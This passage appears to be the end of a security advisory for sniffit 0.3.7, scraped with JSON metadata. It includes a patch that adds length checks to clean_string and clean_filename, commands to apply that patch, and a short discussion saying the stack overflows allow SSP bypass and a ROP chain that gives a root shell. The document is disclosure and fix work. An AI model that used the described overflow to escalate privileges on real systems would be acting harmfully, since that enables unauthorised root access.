sniffit-0.3.7.beta/sn_cfgfile.c 2014-10-22 19:29:03.000000000 +0200 \n+++ sniffit-0.3.7.beta-mod/sn_cfgfile.c 2014-10-22 19:29:12.244971893 +0200 \n@@ -119,6 +119,11 @@ char *clean_string (char *string) \nchar help[20]; \nint i, j; \n \n+if(strlen(string) >= 20){ \n+ fprintf(stderr, \"Error: String too long [%s]\\n\", string); \n+ exit(-1); \n+} \n+ \nj=0; \nfor(i=0;i<strlen(string);i++) \n{ \n@@ -138,6 +143,11 @@ char *clean_filename (char *string) \nchar help[20]; \nint i, j; \n \n+if(strlen(string) >= 20){ \n+ fprintf(stderr, \"Error: String too long [%s]\\n\", string); \n+ exit(-1); \n+} \n+ \nj=0; \nfor(i=0;i<strlen(string);i++) \n{ \n \n[ sniffit-0.3.7-stack-buffer-overflow.patch ] \n \nPatching sniffit 0.3.7: \n \nwget http://hmarco.org/bugs/patches/sniffit-0.3.7-stack-buffer-overflow.patch \ncd sniffit-0.3.7 \npatch -p1 < ../sniffit-0.3.7-stack-buffer-overflow.patch \n \n \nDiscussion \n \nIt is hard to understand why the sniffit is still under Ubuntu universe repository, which is easily installable via apt-get install sniffit. The functions clean_string and clean_filename contain two stack buffer overflows which allow to bypass the Stack Smashing Protector (SSP) very easy and build a sequence of ROP gadgets which finally obtains a root shell. \n \nOn the other hand, it seems that the code of sniffit is no longer maintained, and may contain additional security issues. Therefore, it is very recommend to not use the sniffit at all for the sake of your security. \n \nHector Marco - http://hmarco.org \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/129292/sniffit-escalate.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}

SniffIt vulnerability

Description

Affected Package

Related